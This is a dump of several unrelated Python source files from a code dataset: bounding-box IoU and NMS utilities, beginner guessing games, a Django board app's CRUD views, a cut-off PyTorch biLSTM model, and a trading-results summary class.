2:4],0),0)\n if class_info is not None:\n boxes = concate([x1y1,x2y2, class_info], axis=-1)\n else:\n boxes=concate([x1y1,x2y2],axis=-1)\n return boxes\n\n else:\n raise TypeError('Argument xywh must be a list, tuple, numpy array or tensor.')\n\n\ndef xyxy2xywh(boxes):\n \"\"\"Convert [x1 y1 x2 y2] box format to [x1 y1 w h] format.\"\"\"\n if isinstance(boxes, (list, tuple)):\n # Single box given as a list of coordinates\n assert len(boxes) == 4 or len(boxes) == 5\n x1, y1 = boxes[0], boxes[1]\n w = boxes[2] - x1 + 1\n h = boxes[3] - y1 + 1\n return 
np.array([x1, y1, w, h])\n elif isinstance(boxes, np.ndarray):\n if boxes.ndim==1:\n boxes=np.expand_dims(boxes,0)\n if boxes.shape[-1]>4:\n return np.concatenate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2],boxes[:, 4:]], 1) # w, h\n elif boxes.shape[-1]==4:\n return np.concatenate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2]], 1) # w, h\n elif is_tensor(boxes):\n if boxes.ndim==1:\n boxes=expand_dims(boxes,0)\n if boxes.shape[-1] > 4:\n return concate([(boxes[:, 2:4] + boxes[:, 0:2]) / 2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2],boxes[:, 4:]], 1) # w, h\n else:\n return concate([(boxes[:, 2:4] + boxes[:, 0:2])/2, # cx, cy\n boxes[:, 2:4] - boxes[:, 0:2]], 1) # w, h\n else:\n raise TypeError('Argument xyxy must be a list, tuple, or numpy array.')\n\ndef box_area(boxes: Tensor) -> Tensor:\n \"\"\"\n Computes the area of a set of bounding boxes, which are specified by its\n (x1, y1, x2, y2) coordinates.\n\n Arguments:\n boxes (Tensor[N, 4]): boxes for which the area will be computed. They\n are expected to be in (x1, y1, x2, y2) format\n\n Returns:\n area (Tensor[N]): area for each box\n \"\"\"\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n\n\ndef box_iou(boxes1, boxes2):\n \"\"\"Calculate the ious between each bbox of bboxes1 and bboxes2.\n\n Args:\n boxes1(ndarray/ tensor): shape (n, 4)\n boxes2(ndarray/ tensor): shape (k, 4)\n\n Returns:\n iou(ndarray/ tensor): shape (n, k)\n union (ndarray/ tensor): shape (n, k)\n\n Examples:\n >>> box_iou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[110, 80, 195, 153]])).cpu())\n (tensor([[0.7878]]), tensor([[7337]]))\n >>> box_iou(np.array([[104, 85, 200, 157]]),np.array([[110, 80, 195, 153]]))\n (array([[7.8779e-01]]), array([[7.3370e+03]]))\n >>> box_iou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[10, 20, 45, 73]])).cpu())\n (tensor([[0.]]), tensor([[8767]]))\n >>> box_iou(np.array([[104, 85, 200, 157]]),np.array([[10, 20, 45, 73]]))\n (array([[0.0000e+00]]), array([[8.7670e+03]]))\n\n \"\"\"\n area1 = box_area(boxes1)\n area2 = box_area(boxes2)\n\n lt = maximum(boxes1[:, None, :2], boxes2[:, :2]) # [N,M,2]\n rb = minimum(boxes1[:, None, 2:], boxes2[:, 2:]) # [N,M,2]\n\n wh = clip(rb- lt,min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n\n union = area1[:, None] + area2 - inter\n iou = inter / union\n return iou, union\n\nbbox_iou=box_iou\n\n\ndef box_giou(boxes1, boxes2):\n \"\"\"\n Generalized IoU from https://giou.stanford.edu/\n The boxes should be in [x0, y0, x1, y1] format\n Returns a [N, M] pairwise matrix, where N = len(boxes1)\n and M = len(boxes2)\n\n Examples:\n >>> box_giou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[110, 80, 195, 153]])).cpu())\n tensor([[0.7803]])\n >>> box_giou(np.array([[104, 85, 200, 157]]),np.array([[110, 80, 195, 153]]))\n array([[7.8035e-01]])\n >>> box_giou(to_tensor(np.array([[104, 85, 200, 157]])).cpu(),to_tensor(np.array([[10, 20, 45, 73]])).cpu())\n tensor([[-0.6632]])\n >>> box_giou(np.array([[104, 85, 200, 157]]),np.array([[10, 20, 45, 73]]))\n array([[-6.6320e-01]])\n\n \"\"\"\n # degenerate boxes gives inf / nan results\n # so do an early check\n assert (boxes1[:, 2:] >= boxes1[:, :2]).all()\n assert (boxes2[:, 2:] >= boxes2[:, :2]).all()\n iou, union = box_iou(boxes1, boxes2)\n\n lt = minimum(boxes1[:, None, :2], boxes2[:, :2])\n rb =maximum(boxes1[:, None, 2:], boxes2[:, 2:])\n\n wh = clip(rb - lt,min=0) # [N,M,2]\n area = 
wh[:, :, 0] * wh[:, :, 1]\n\n return iou - (area - union) / area\n\nbbox_giou=box_giou\nbbox_giou_numpy=box_giou\n\ndef clip_boxes_to_image(boxes, size):\n\n \"\"\"\n Clip boxes so that they lie inside an image of size `size`.\n\n Args:\n boxes (Tensor[N, 4]): boxes in (x1, y1, x2, y2) format\n size (Tuple[height, width]): size of the image\n Returns:\n clipped_boxes (Tensor[N, 4])\n\n \"\"\"\n height,width=size\n if len(boxes)>0:\n boxes[:,0]= clip(boxes[:,0],min=0, max=width)\n boxes[:,1]= clip(boxes[:,1],min=0, max=height)\n boxes[:,2]= clip(boxes[:,2],min=0, max=width)\n boxes[:,3]= clip(boxes[:,3],min=0,max=height)\n return boxes\n\n\ndef nms(boxes, threshold):\n \"\"\"\n non max suppression\n\n Args\n boxes: numpy array n x 5\n input bbox array, one [x1, y1, x2, y2, score] row per box\n threshold: float number\n IoU threshold above which overlapping boxes are suppressed\n\n Returns:\n tuple of (selected boxes, list of picked indices), or None if nothing is kept\n \"\"\"\n # if there are no boxes, return an empty list\n\n\n if len(boxes) == 0:\n return []\n\n # initialize the list of picked indexes\n pick = []\n box_len = len(boxes)\n # grab the coordinates of the bounding boxes\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n sorted_index = np.argsort(score)\n # keep looping while some indexes still remain in the indexes list\n while len(sorted_index) > 0:\n # grab the highest-scoring remaining index and pick it\n last = len(sorted_index) - 1\n i = sorted_index[-1]\n pick.append(int(i))\n sorted_index = sorted_index[:-1]\n if len(sorted_index) == 0:\n break\n xx1 = np.maximum(x1[i], x1[sorted_index[:last]])\n yy1 = np.maximum(y1[i], y1[sorted_index[:last]])\n xx2 = np.minimum(x2[i], x2[sorted_index[:last]])\n yy2 = np.minimum(y2[i], y2[sorted_index[:last]])\n # compute the width and height of the intersection\n w = np.clip(xx2 - xx1 + 1, 0, None)\n h = np.clip(yy2 - yy1 + 1, 0, None)\n inter = w * h\n\n # suppress any remaining box that overlaps the picked one too much\n IoU = inter / (area[i] + area[sorted_index[:last]] - inter)\n sorted_index = sorted_index[IoU <= threshold]\n\n if boxes is not None and len(pick) > 0:\n try:\n out = boxes[pick]\n if out.ndim == 1:\n out = np.expand_dims(out, 0)\n if len(out) == 0:\n return None\n return out,pick\n except Exception as e:\n print(e)\n print('box_len', box_len)\n print('pick', len(pick))\n print('boxes', len(boxes))\n\n return None\n\n\n\ndef matrix_iou(a, b):\n \"\"\"\n return iou of a and b, numpy version for data augmentation\n \"\"\"\n lt = np.maximum(a[:, np.newaxis, 0:2], b[:, 0:2])\n rb = np.minimum(a[:, np.newaxis, 2:4], b[:, 2:4])\n\n area_i = np.prod(rb - lt, axis=2) * (lt < rb).all(axis=2)\n area_a = np.prod(a[:, 2:4] - a[:, 0:2], axis=1)\n area_b = np.prod(b[:, 2:4] - b[:, 0:2], axis=1)\n return area_i / (area_a[:, np.newaxis] + area_b - area_i)\n\n\ndef matrix_iof(a, b):\n \"\"\"\n return iof of a and b, numpy version for data augmentation\n \"\"\"\n lt = np.maximum(a[:, np.newaxis, 0:2], b[:, 0:2])\n rb = np.minimum(a[:, np.newaxis, 2:4], b[:, 2:4])\n\n area_i = np.prod(rb - lt, axis=2) * (lt < rb).all(axis=2)\n area_a = np.prod(a[:, 2:4] - a[:, 0:2], axis=1)\n return area_i / np.maximum(area_a[:, np.newaxis], 1)\n\n\n\n# def bbox_iou(bboxes1, bboxes2, mode='iou', allow_neg=False):\n# \"\"\"Calculate 
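A quick numeric check of nms() above, with made-up [x1, y1, x2, y2, score] rows -- two heavily overlapping boxes plus one separate box:

import numpy as np

boxes = np.array([[100., 100., 200., 200., 0.9],
                  [104.,  98., 198., 204., 0.8],   # near-duplicate of row 0
                  [300., 300., 380., 380., 0.7]])
out, pick = nms(boxes, threshold=0.5)
# pick == [0, 2]: the lower-scoring duplicate (row 1) is suppressed,
# the distinct box (row 2) survives.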
the ious between each bbox of bboxes1 and bboxes2.\n#\n# Args:\n# allow_neg ():\n# bboxes1(ndarray): shape (n, 4)\n# bboxes2(ndarray): shape (k, 4)\n# mode(str): iou (intersection over union) or iof (intersection\n# over foreground)\n#\n# Returns:\n# ious(ndarray): shape (n, k)\n# \"\"\"\n#\n# assert mode in ['iou', 'iof']\n# if (bboxes1 is None or len(bboxes1) == 0) and (bboxes2 is None or len(bboxes2) == 0):\n# return np.ones(1)\n#\n# elif bboxes1 is None or len(bboxes1)==0 or bboxes2 is None or len(bboxes2)==0:\n# return np.zeros(1)\n#\n# bboxes1 = bboxes1.astype(np.float32)\n# bboxes2 = bboxes2.astype(np.float32)\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# ious = np.zeros((rows, cols), dtype=np.float32)\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = np.zeros((cols, rows), dtype=np.float32)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (\n# bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (\n# bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])\n# if not allow_neg:\n# overlap = np.maximum(x_end - x_start + 1, 0) * np.maximum(y_end - y_start + 1, 0)\n# else:\n# overlap = (x_end - x_start + 1) * (y_end - y_start + 1)\n# flag = np.ones(overlap.shape)\n# flag[x_end - x_start + 1 < 0] = -1.\n# flag[y_end - y_start + 1 < 0] = -1.\n# overlap = flag * np.abs(overlap)\n#\n# if mode == 'iou':\n# union = area1[i] + area2 - overlap\n# else:\n# union = area1[i] if not exchange else area2\n# ious[i, :] = overlap / union\n# if exchange:\n# ious = ious.T\n# return ious\n\n# def bbox_giou_numpy(bboxes1, bboxes2):\n# \"\"\"Calculate the gious between each bbox of bboxes1 and bboxes2.\n#\n# Args:\n# bboxes1(ndarray): shape (n, 4)\n# bboxes2(ndarray): shape (k, 4)\n#\n# Returns:\n# gious(ndarray): shape (n, k)\n# \"\"\"\n#\n#\n# bboxes1 = bboxes1.astype(np.float32)\n# bboxes2 = bboxes2.astype(np.float32)\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# ious = np.zeros((rows, cols), dtype=np.float32)\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = np.zeros((cols, rows), dtype=np.float32)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (\n# bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (\n# bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])\n# x_min = np.minimum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])\n# y_min = np.minimum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])\n# x_max = np.maximum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])\n# y_max = np.maximum(bboxes1[i, 3], bboxes2[:, 3])\n#\n# overlap = np.clip(np.maximum(x_end - x_start + 1, 0) * np.maximum(y_end - y_start + 1, 0),1e-8,np.inf)\n# closure = np.clip(np.maximum(x_max - x_min + 1, 0) * np.maximum(y_max - y_min + 1, 0),1e-8,np.inf)\n#\n# union =np.clip( area1[i] + area2 - overlap,1e-8,np.inf)\n#\n# ious[i, :] = overlap / union - (closure - union) / closure\n# if exchange:\n# ious = ious.T\n# 
return ious\n\n# def bbox_giou(bboxes1, bboxes2):\n# \"\"\"Calculate GIoU loss on anchor boxes\n# Reference Paper:\n# \"Generalized Intersection over Union: A Metric and A Loss for Bounding Box Regression\"\n# https://arxiv.org/abs/1902.09630\n#\n# Args:\n# bboxes1: tensor, shape=(n, 4), xyxy\n# bboxes2: tensor, shape=(n, 4), xyxy\n#\n# Returns:\n# giou: tensor, shape=(batch, feat_w, feat_h, anchor_num, 1)\n#\n# \"\"\"\n# bboxes1 = bboxes1.float()\n# bboxes2 = bboxes2.float()\n# rows = bboxes1.shape[0]\n# cols = bboxes2.shape[0]\n# # if (bboxes1 is None or len(bboxes1) == 0) and (bboxes2 is None or len(bboxes2) == 0):\n# # return ones((rows, cols))\n# #\n# # elif bboxes1 is None or len(bboxes1)==0 or bboxes2 is None or len(bboxes2)==0:\n# # return zeros((rows, cols))\n# #\n#\n# ious = zeros((rows, cols))\n# ious.requires_grad=True\n# if rows * cols == 0:\n# return ious\n# exchange = False\n# if bboxes1.shape[0] > bboxes2.shape[0]:\n# bboxes1, bboxes2 = bboxes2, bboxes1\n# ious = zeros((cols, rows),requires_grad=True)\n# exchange = True\n# area1 = (bboxes1[:, 2] - bboxes1[:, 0] + 1) * (bboxes1[:, 3] - bboxes1[:, 1] + 1)\n# area2 = (bboxes2[:, 2] - bboxes2[:, 0] + 1) * (bboxes2[:, 3] - bboxes2[:, 1] + 1)\n# for i in range(bboxes1.shape[0]):\n# x_start = maximum(bboxes1[i, 0], bboxes2[:, 0])\n# x_min = minimum(bboxes1[i, 0], bboxes2[:, 0])\n# y_start = maximum(bboxes1[i, 1], bboxes2[:, 1])\n# y_min = minimum(bboxes1[i, 1], bboxes2[:, 1])\n# x_end = minimum(bboxes1[i, 2], bboxes2[:, 2])\n# x_max = maximum(bboxes1[i, 2], bboxes2[:, 2])\n# y_end = minimum(bboxes1[i, 3], bboxes2[:, 3])\n# y_max = maximum(bboxes1[i, 3], bboxes2[:, 3])\n#\n# overlap =clip( maximum(x_end - x_start + 1, 0) * maximum(y_end - y_start + 1, 0),min=1e-8)\n# closure = clip(maximum(x_max - x_min + 1, 0) * maximum(y_max - y_min + 1, 0),min=1e-8)\n#\n# union = clip(area1[i] + area2 - overlap,min=1e-8)\n#\n# ious[i, :] = overlap / union - (closure - union) / closure\n# if exchange:\n# ious = ious.T\n# return ious\n\ndef bbox_diou(bboxes1, bboxes2):\n \"\"\"Calculate DIoU loss on anchor boxes\n Reference Paper:\n \"Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression\"\n https://arxiv.org/abs/1911.08287\n\n Args:\n bboxes1: tensor, shape=(batch, feat_w, feat_h, anchor_num, 4), xywh\n bboxes2: tensor, shape=(batch, feat_w, feat_h, anchor_num, 4), xywh\n\n Returns:\n diou: tensor, shape=(batch, feat_w, feat_h, anchor_num, 1)\n\n \"\"\"\n\n b1_mins = bboxes1[..., :2]\n b1_maxes = bboxes1[..., 2:4]\n b1_wh=b1_maxes-b1_mins\n\n\n b2_mins = bboxes2[..., :2]\n b2_maxes = bboxes2[..., 2:4]\n b2_wh=b2_maxes-b2_mins\n\n intersect_mins = maximum(b1_mins, b2_mins)\n intersect_maxes = minimum(b1_maxes, b2_maxes)\n intersect_wh = maximum(intersect_maxes - intersect_mins, 0.)\n intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]\n\n b1_area = b1_wh[..., 0] * b1_wh[..., 1]\n b2_area = b2_wh[..., 0] * b2_wh[..., 1]\n union_area = b1_area + b2_area - intersect_area\n # calculate IoU, add epsilon in denominator to avoid dividing by 0\n iou = intersect_area / (union_area + epsilon())\n\n # box center distance\n center_distance = reduce_sum(square((b1_maxes+b1_mins)/2 - (b2_maxes+b2_mins)/2), axis=-1)\n # get enclosed area\n enclose_mins = minimum(b1_mins, b2_mins)\n enclose_maxes = maximum(b1_maxes, b2_maxes)\n enclose_wh =maximum(enclose_maxes - enclose_mins, 0.0)\n # get enclosed diagonal distance\n enclose_diagonal = reduce_sum(square(enclose_wh), axis=-1)\n # calculate DIoU, add epsilon in denominator to avoid 
dividing by 0\n diou = iou - 1.0 * center_distance/ (enclose_diagonal + epsilon())\n\n # calculate param v and alpha to extend to CIoU\n #v = 4*K.square(tf.math.atan2(b1_wh[..., 0], b1_wh[..., 1]) - tf.math.atan2(b2_wh[..., 0], b2_wh[..., 1])) / (math.pi * math.pi)\n #alpha = v / (1.0 - iou + v)\n #diou = diou - alpha*v\n\n diou = expand_dims(diou, -1)\n return diou\n\ndef convert_to_square(bboxes):\n \"\"\"Convert bounding boxes to a square form.\n Args:\n bboxes: a float numpy array of shape [n, 5].\n Returns:\n a float numpy array of shape [n, 5],\n squared bounding boxes.\n\n Examples:\n >>> convert_to_square(to_tensor(np.array([[104, 85, 200, 157]]))).cpu()\n tensor([[104, 73, 200, 169]])\n >>> convert_to_square(np.array([[104, 85, 200, 157]]))\n array([[104, 73, 200, 169]])\n \"\"\"\n\n h = bboxes[:, 3] - bboxes[:, 1]\n w = bboxes[:, 2] - bboxes[:, 0]\n max_len = maximum(w, h)\n\n bboxes[:, 0] = round(bboxes[:, 0] - 0.5 * (max_len - w))\n bboxes[:, 1] = round(bboxes[:, 1] - 0.5 * (max_len - h))\n bboxes[:, 2] = bboxes[:, 0] + max_len\n bboxes[:, 3] = bboxes[:, 1] + max_len\n return bboxes","sub_path":"trident/data/bbox_common.py","file_name":"bbox_common.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88277681","text":"from __future__ import print_function\nimport random\n\n\n\ndef validate():\n guess = 'a' #initialization with a bad guess\n answer = 'hangman word'\n while guess not in answer:\n guess = raw_input('Name a letter in \\'' + answer + '\\': ')\n print('Thank you!')\n \n \ndef guess_winner(players=('Amy', 'Bill', 'Cathy', 'Dale')):\n ''' This function guesses who will be the winner out of\n the four given names.\n \n The players default to 'Amy', 'Bill', 'Cathy', and 'Dale'.\n The winner is chosen at random and the user keeps guessing until right.\n '''\n \n winner = random.choice(players)\n \n ####\n # Now the code will begin to choose the winner\n ####\n \n print('Guess which of these people won the lottery: ',end='')\n for p in players[:len(players)-1]: # Print the prompt and every\n # player but the last, separated by commas.\n \n print(p,', ', end='')\n print(players[len(players)-1]) # Print the last player's name\n # without a trailing comma.\n \n \n ####\n # Read guesses until the user names the winner; each wrong guess\n # prints 'Guess again!' and increments the count, then the total\n # is printed and returned.\n ####\n \n guesses = 1\n while raw_input() != winner:\n print('Guess again!')\n guesses += 1\n print('You guessed in', guesses, 'guesses!')\n return guesses\n \n \n \ndef goguess():\n \n print('I have a number between 1 and 20 inclusive.')\n \n number = random.randint(1, 20)\n guesses = 0\n \n while True:\n guess = int(raw_input('Your guess: '))\n guesses += 1\n if guess > number:\n print('number is too high')\n elif guess < number:\n print('number is too low')\n else:\n break\n \n print('Right! My number is', number, '!', 'You guessed in', guesses, 'guesses!')
","sub_path":"1.3/1.3.8/LEpperson138.py","file_name":"LEpperson138.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"545645916","text":"i = int(input())\nwhile i != -1:\n miles = 0\n previous_time = 0\n while i > 0:\n time = list(map(int, input().split()))\n time_traveled = time[1] - previous_time\n previous_time = time[1]\n miles += time[0]*time_traveled\n i -= 1\n print('%d miles' % miles)\n i = int(input())\n","sub_path":"python/speed_limit.py","file_name":"speed_limit.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270545903","text":"from django.shortcuts import render, redirect\nfrom .models import Board\n\n# Create your views here.\n# Post fields: title, contents, author\n\ndef index(request) : \n # Fetch every post stored in the Board model and display them\n boards = Board.objects.all()\n context = {\n 'boards' : boards\n }\n return render(request, 'index.html', context)\n\ndef new(request) :\n return render(request, 'new.html')\n\ndef create(request) : \n title = request.GET['title']\n contents = request.GET['contents']\n creator = request.GET['creator']\n \n new_board = Board(title=title, contents=contents, creator=creator)\n # Save to the database\n #new_board.save() -- objects.create() below does the save in one step \n\n new_board = Board.objects.create(title=title, contents=contents, creator=creator)\n return redirect(f'/boards/{new_board.id}')\n\ndef show(request, id) :\n # Use filter to look up values\n board = Board.objects.get(id=id)\n context = {\n 'board' : board\n }\n return render(request, 'show.html', context)\n\ndef edit(request, id):\n # A form pre-filled with the existing contents\n board = Board.objects.get(id=id)\n context = {\n 'board' : board\n }\n return render(request, 'edit.html', context)\n\n# Replace the existing contents and write them back to the row\ndef update(request, id):\n # This is where the update actually happens\n board = Board.objects.get(id=id)\n title = request.GET['title']\n contents = request.GET['contents']\n \n board.title = title\n board.contents = contents\n board.save()\n\n context = {\n 'board' : board\n } \n return redirect(f'/boards/{board.id}')\n\ndef delete(request,id):\n board = Board.objects.get(id=id)\n board.delete()\n return redirect('/boards')","sub_path":"Day8/crudtest/boards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41375611","text":"'''\nModel3:\ntime-batched biLSTM\nno stacked layer\nfor multiclass classification\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass BiDirTBLSTM(nn.Module):\n\tdef __init__(self, vocab_size, embedding_dim, n_classes,rnn_hidden_size, batch_size, n_layers = 1, pbatch_size=1, seq_len=500):\n\t\tsuper(BiDirTBLSTM, self).__init__()\n\t\tself.vocab_size = vocab_size\n\t\tself.embedding_dim = embedding_dim\n\t\tself.n_classes = n_classes\n\t\tself.rnn_hidden_size = rnn_hidden_size\n\t\tself.n_layers = n_layers\n\t\tself.pbatch_size = pbatch_size\n\t\tself.batch_size = batch_size\n\t\tself.seq_len = seq_len\n\n\t\tself.word_embeddings = nn.Embedding(vocab_size, embedding_dim)\n\n\t\t#TB\n\t\tself.tb_size = self.seq_len // self.pbatch_size\n\t\tassert(self.tb_size str:\r\n '''\r\n Provides a common method and format of creating and referencing columns with an index in the label.\r\n \r\n Args:\r\n label: The base label for the column without the index.\r\n index: The index of the column name.\r\n 
\r\n Returns:\r\n The concatenated label with index in a standard format.\r\n e.g. 'Geometric Mean Sample 7'\r\n '''\r\n return '{0} {1}'.format(label, index)\r\n\r\ndef get_results_list(model_dict: dict) -> list:\r\n '''\r\n Creates list of objects from a dictionary.\r\n \r\n Args:\r\n model_dict: Dictionary object.\r\n \r\n Returns:\r\n A list of objects from the dictionary.\r\n '''\r\n model_list = []\r\n for value in model_dict.values():\r\n model_list.append(value)\r\n return model_list \r\n\r\ndef get_hold_period_from_model_id(model_id: str) -> int:\r\n '''\r\n Parses the model_id to get the hold_period.\r\n \r\n Args:\r\n model_id: Unique ID from the model results dictionary.\r\n \r\n Returns:\r\n The hold period from the model_id.\r\n '''\r\n return int(model_id.split('-')[2])\r\n\r\ndef get_mean_profit_and_total_num_of_sales(model_results_dict: dict, profit_label: str) -> tuple:\r\n ''' \r\n Returns tuple of mean profit and total sales.\r\n \r\n Args:\r\n model_results_dict: the dictionary of dictionaries of DataFrames representing our raw data. The top level \r\n categories represent individual model runs, with unique model_ids for each model. The next level represents \r\n results broken down by individual groups (e.g. stock symbols).\r\n profit_label: The column label for profit.\r\n \r\n Returns: \r\n Tuple of mean profit (float) and total sales (int) - a sale being defined as profit != None.\r\n '''\r\n results_list = get_results_list(model_results_dict)\r\n concat_df = pd.concat(results_list, sort=False, ignore_index = True)[profit_label]\r\n profit_total = 0\r\n num_of_sales = 0\r\n for i in range(len(concat_df)):\r\n if concat_df.at[i] != None:\r\n if np.isnan(concat_df.at[i]):\r\n raise Exception(\"NaN values found in {0} - data should be pre-filtered.\".format(profit_label))\r\n profit_total += concat_df.at[i]\r\n num_of_sales += 1\r\n return profit_total / num_of_sales, num_of_sales\r\n\r\ndef get_mean_profit_per_day(mean_profit: float, hold_period: int) -> float:\r\n ''' \r\n Args:\r\n mean_profit: Mean_profit per buy/sell transaction.\r\n hold_period: Number of days to hold before selling.\r\n \r\n Returns:\r\n The mean profit earned per day over the hold period\r\n '''\r\n return mean_profit / hold_period \r\n\r\nclass SummaryResults:\r\n '''\r\n Used for generating and manipulating a DataFrame of summary results/statistics from our raw model results.\r\n \r\n Note:\r\n An object of this class should be generated using one of the class's classmethods.\r\n \r\n Args:\r\n summary_df: the DataFrame containing the object's summary results/statistics.\r\n model_results_dict: the dictionary of dictionaries of DataFrames representing our raw data. The top level \r\n categories represent individual model runs, with unique model_ids for each model. The next level represents \r\n results broken down by individual groups (e.g. 
stock symbols).\r\n \r\n Example:\r\n {\r\n '55-7-14': \r\n {\r\n 'A': pd.DataFrame\r\n }\r\n }\r\n '''\r\n MEAN_PROFIT_LABEL = 'Mean Profit'\r\n TOTAL_SALES_COUNT_LABEL = 'Total Sales Count'\r\n MEAN_PROFIT_PER_DAY_LABEL = 'Mean Profit Per Day'\r\n GEOMETRIC_MEAN_LABEL = 'Geometric Mean'\r\n COMPOUND_INVESTMENT_SAMPLE_BASE_LABEL = 'Compound Investment Sample'\r\n COMPOUND_INVESTMENT_SAMPLES_MEAN = 'Compound Investment Sample Mean'\r\n TRUE_POSITIVE_LABEL = 'True Positive'\r\n FALSE_POSITIVE_LABEL = 'False Positive'\r\n FALSE_NEGATIVE_LABEL = 'False Negative'\r\n TRUE_NEGATIVE_LABEL = 'True Negative'\r\n \r\n def __init__(self, summary_df: pd.DataFrame, results_dict: dict):\r\n self.summary_df = summary_df\r\n self.results_dict = results_dict\r\n \r\n @classmethod\r\n def from_model_results(cls, model_results_dict: dict, profit_label: str) -> SummaryResults:\r\n '''\r\n Creates a SummaryResults object from experiment results by running analyses\r\n and constructing the internal DataFrame. The default DataFrame constructed in this method\r\n should not contain columns that are not always useful, in order to reduce clutter and reduce \r\n time spent constructing the basic SummaryResults DataFrame. Additional columns can be added \r\n through additional SummaryResults methods.\r\n \r\n Args:\r\n results: The results output DataFrame from an experiment model. \r\n profit_label: The column label for profit.\r\n \r\n Returns:\r\n SummaryResults object.\r\n '''\r\n summary_df = pd.DataFrame(index = list(model_results_dict.keys()))\r\n \r\n # Create new empty columns\r\n summary_df[cls.MEAN_PROFIT_LABEL] = np.float(0)\r\n summary_df[cls.TOTAL_SALES_COUNT_LABEL] = np.int(0)\r\n summary_df[cls.MEAN_PROFIT_PER_DAY_LABEL] = np.float(0)\r\n \r\n summary_results = cls(summary_df, model_results_dict)\r\n \r\n # Assign values to those columns row by row\r\n for model_id in model_results_dict.keys():\r\n mean_profit_and_total_sales = get_mean_profit_and_total_num_of_sales(model_results_dict[model_id], profit_label)\r\n summary_df.at[model_id, cls.MEAN_PROFIT_LABEL] = mean_profit_and_total_sales[0]\r\n summary_df.at[model_id, cls.TOTAL_SALES_COUNT_LABEL] = mean_profit_and_total_sales[1]\r\n hold_period = get_hold_period_from_model_id(model_id)\r\n summary_df.at[model_id, cls.MEAN_PROFIT_PER_DAY_LABEL] = get_mean_profit_per_day(mean_profit_and_total_sales[0], \r\n hold_period)\r\n \r\n return summary_results\r\n \r\n @classmethod\r\n def from_json_file(cls, summary_filepath: str = None, original_results_filepath: str = None) -> SummaryResults:\r\n '''\r\n Loads a saved SummaryResults object from a saved file. Can optionally load the original results DataFrame\r\n used for calculating the SummaryResults DataFrame if it is available.\r\n Note: the original results DataFrame is required for doing additional analysis.\r\n \r\n Args:\r\n summary_filepath: The path for saved ResultsSummary json data.\r\n original_results_filepath: The path for saved original results json data (optional).\r\n \r\n Returns:\r\n SummaryResults object.\r\n '''\r\n summary_df = None\r\n results_dict = None\r\n \r\n # Load summary results dataframe\r\n try:\r\n summary_df = pd.read_json(summary_filepath)\r\n except ValueError as e:\r\n print(\"Invalid filepath '{0}'.\".format(summary_filepath))\r\n raise e\r\n if original_results_filepath is not None:\r\n # Load original results dictionary of dictionaries of DataFrames\r\n raise NotImplementedError(\"Original results loading is not yet implemented. 
